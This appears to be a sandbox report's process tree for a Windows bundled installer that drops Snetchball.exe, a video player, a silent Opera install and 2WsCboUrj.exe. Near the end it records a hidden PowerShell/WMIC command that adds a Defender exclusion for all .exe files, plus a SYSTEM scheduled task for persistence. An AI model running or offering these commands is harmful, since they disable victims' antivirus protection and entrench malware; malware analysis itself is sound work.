C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=144 --mojo-platform-channel-handle=4524 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:19⤵PID:5384
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=145 --mojo-platform-channel-handle=3844 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:19⤵PID:2152
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=146 --mojo-platform-channel-handle=3164 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:19⤵PID:2860
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=147 --mojo-platform-channel-handle=4316 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:19⤵PID:1056
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=148 --mojo-platform-channel-handle=4256 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:19⤵PID:4968
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=149 --mojo-platform-channel-handle=4356 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:19⤵PID:2976
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=150 --mojo-platform-channel-handle=4260 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:19⤵PID:196
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=151 --mojo-platform-channel-handle=4148 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:19⤵PID:6052
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=152 --mojo-platform-channel-handle=2400 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:19⤵PID:2156
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=153 --mojo-platform-channel-handle=4108 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:19⤵PID:1836
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=154 --mojo-platform-channel-handle=4056 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:19⤵PID:6004
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=155 --mojo-platform-channel-handle=1280 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:19⤵PID:5232
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=156 --mojo-platform-channel-handle=4432 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:19⤵PID:5888
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=157 --mojo-platform-channel-handle=4396 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:19⤵PID:4112
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=158 --mojo-platform-channel-handle=3660 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:19⤵PID:1036
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" 8⤵
- Executes dropped EXE
PID:5960 -
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" 8⤵
- Executes dropped EXE
PID:5788 -
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" 8⤵
- Executes dropped EXE
PID:5640 -
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" 8⤵
- Executes dropped EXE
PID:5380 -
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" 8⤵
- Executes dropped EXE
PID:1312 -
C:\Users\Admin\AppData\Local\Temp\XY5cJ0q5\TVCwEHwXmrhkdZhEKh.exe C:\Users\Admin\AppData\Local\Temp\XY5cJ0q5\TVCwEHwXmrhkdZhEKh.exe 4⤵
- Executes dropped EXE
PID:6064 -
C:\Users\Admin\AppData\Local\Temp\is-NM97J.tmp\TVCwEHwXmrhkdZhEKh.tmp "C:\Users\Admin\AppData\Local\Temp\is-NM97J.tmp\TVCwEHwXmrhkdZhEKh.tmp" /SL5="$20396,4415326,54272,C:\Users\Admin\AppData\Local\Temp\XY5cJ0q5\TVCwEHwXmrhkdZhEKh.exe" 5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
PID:5208 -
C:\Users\Admin\AppData\Local\Free Video Player\freevideoplayer.exe "C:\Users\Admin\AppData\Local\Free Video Player\freevideoplayer.exe" -i 6⤵
- Executes dropped EXE
PID:2012 -
C:\Users\Admin\AppData\Local\Free Video Player\freevideoplayer.exe "C:\Users\Admin\AppData\Local\Free Video Player\freevideoplayer.exe" -s 6⤵
- Executes dropped EXE
PID:492 -
C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5828 -s 2260 4⤵
- Program crash
PID:404 -
C:\Users\Admin\AppData\Local\Temp\h2jPqaN0\bSWFf7XkEILq.exe C:\Users\Admin\AppData\Local\Temp\h2jPqaN0\bSWFf7XkEILq.exe --silent --allusers=0 4⤵
- Executes dropped EXE
PID:4448 -
C:\Users\Admin\AppData\Local\Temp\7zS061095BA\setup.exeC:\Users\Admin\AppData\Local\Temp\7zS061095BA\setup.exe --silent --allusers=0 --server-tracking-blob=YmMwZGU2YjFhMjE3MTZiMzEwY2M0NzBlZTIxNGFhNDcwNTg0YzMxOTI2ZmUxNGRkOGI3MDY4OThlMWQ4YjdhNTp7ImNvdW50cnkiOiJHQiIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijoib3BlcmEiLCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cy8/dXRtX21lZGl1bT1hcGImdXRtX3NvdXJjZT1SU1RQJnV0bV9jYW1wYWlnbj1vcDEzMiIsInRpbWVzdGFtcCI6IjE3MjExMDY5MDIuMzA1NCIsInVzZXJhZ2VudCI6Ik1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDEwLjA7IFdpbjY0OyB4NjQpIEFwcGxlV2ViS2l0LzUzNy4zNiAoS0hUTUwsIGxpa2UgR2Vja28pIENocm9tZS8xMTguMC4wLjAgU2FmYXJpLzUzNy4zNiIsInV0bSI6eyJjYW1wYWlnbiI6Im9wMTMyIiwibWVkaXVtIjoiYXBiIiwic291cmNlIjoiUlNUUCJ9LCJ1dWlkIjoiZjkxODMwYzItOTFkNS00YTEwLWJkOWUtZjM5MDA3ZTEzMGU2In0=5⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates connected drives
- Modifies system certificate store
PID:5752 -
C:\Users\Admin\AppData\Local\Temp\7zS061095BA\setup.exe C:\Users\Admin\AppData\Local\Temp\7zS061095BA\setup.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=112.0.5197.24 --initial-client-data=0x33c,0x340,0x344,0x318,0x348,0x71b8b1f4,0x71b8b200,0x71b8b20c 6⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2880 -
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\setup.exe "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\setup.exe" --version 6⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5452 -
C:\Users\Admin\AppData\Local\Temp\7zS061095BA\setup.exe"C:\Users\Admin\AppData\Local\Temp\7zS061095BA\setup.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera" --profile-folder --language=en --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=0 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=5752 --package-dir-prefix="C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_20240716051509" --session-guid=e1474dd1-4685-48e3-9e00-fdb95a4141cc --server-tracking-blob=MzkyMjU2OWQ5ODZmOTQwNjg2YWM2M2RhODc1MjQ3ODAyYjY2MTZiNTEzNWRkZDk2ZTQ4MjNlNDQzZTFhYzI1Mzp7ImNvdW50cnkiOiJHQiIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijp7Im5hbWUiOiJvcGVyYSJ9LCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cy8/dXRtX21lZGl1bT1hcGImdXRtX3NvdXJjZT1SU1RQJnV0bV9jYW1wYWlnbj1vcDEzMiIsInN5c3RlbSI6eyJwbGF0Zm9ybSI6eyJhcmNoIjoieDg2XzY0Iiwib3BzeXMiOiJXaW5kb3dzIiwib3BzeXMtdmVyc2lvbiI6IjExIiwicGFja2FnZSI6IkVYRSJ9fSwidGltZXN0YW1wIjoiMTcyMTEwNjkwMi4zMDU0IiwidXNlcmFnZW50IjoiTW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV2luNjQ7IHg2NCkgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzExOC4wLjAuMCBTYWZhcmkvNTM3LjM2IiwidXRtIjp7ImNhbXBhaWduIjoib3AxMzIiLCJtZWRpdW0iOiJhcGIiLCJzb3VyY2UiOiJSU1RQIn0sInV1aWQiOiJmOTE4MzBjMi05MWQ1LTRhMTAtYmQ5ZS1mMzkwMDdlMTMwZTYifQ== --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=4C060000000000006⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates connected drives
PID:4800 -
C:\Users\Admin\AppData\Local\Temp\7zS061095BA\setup.exeC:\Users\Admin\AppData\Local\Temp\7zS061095BA\setup.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=112.0.5197.24 --initial-client-data=0x32c,0x330,0x334,0x308,0x338,0x70ffb1f4,0x70ffb200,0x70ffb20c7⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5464 -
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202407160515091\assistant\Assistant_111.0.5168.25_Setup.exe_sfx.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202407160515091\assistant\Assistant_111.0.5168.25_Setup.exe_sfx.exe"6⤵
- Executes dropped EXE
PID:3552 -
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202407160515091\assistant\assistant_installer.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202407160515091\assistant\assistant_installer.exe" --version6⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3476 -
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202407160515091\assistant\assistant_installer.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202407160515091\assistant\assistant_installer.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=111.0.5168.25 --initial-client-data=0x250,0x254,0x258,0x22c,0x25c,0xa49f88,0xa49f94,0xa49fa07⤵
- Executes dropped EXE
- Loads dropped DLL
PID:6068 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5828 -s 18844⤵
- Program crash
PID:896 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5828 -s 21764⤵
- Program crash
PID:5708 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5828 -s 16724⤵
- Program crash
PID:1912 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5828 -s 21204⤵
- Program crash
PID:5212 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5828 -s 21484⤵
- Program crash
PID:1868 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5828 -s 21764⤵
- Program crash
PID:1776 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5828 -s 21484⤵
- Program crash
PID:6084 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5828 -s 19884⤵
- Program crash
PID:5368 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5828 -s 19324⤵
- Program crash
PID:4736 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5828 -s 18524⤵
- Program crash
PID:2628 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5828 -s 21404⤵
- Program crash
PID:5356 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\RQPXR0N3\2WsCboUrj.exe"4⤵PID:3124
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\RQPXR0N3\2WsCboUrj.exe"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5300 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5828 -s 10804⤵
- Program crash
PID:3716 -
C:\Users\Admin\AppData\Local\Temp\RQPXR0N3\2WsCboUrj.exeC:\Users\Admin\AppData\Local\Temp\RQPXR0N3\2WsCboUrj.exe /did=757674 /S4⤵
- Checks BIOS information in registry
- Executes dropped EXE
- Enumerates system info in registry
PID:716 -
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"5⤵PID:3824
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True6⤵PID:1632
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4144 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True8⤵
- Suspicious use of AdjustPrivilegeToken
PID:5456 -
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bEtnHIcecDUtXwQuWS" /SC once /ST 05:16:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\RQPXR0N3\2WsCboUrj.exe\" z0 /gWdidO 757674 /S" /V1 /F5⤵
- Drops file in Windows directory
- Scheduled Task/Job: Scheduled Task
PID:5536 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 716 -s 8525⤵PID:1896
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5828 -s 18244⤵
- Program crash
PID:4512 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5828 -s 19804⤵
- Program crash
PID:5468 -
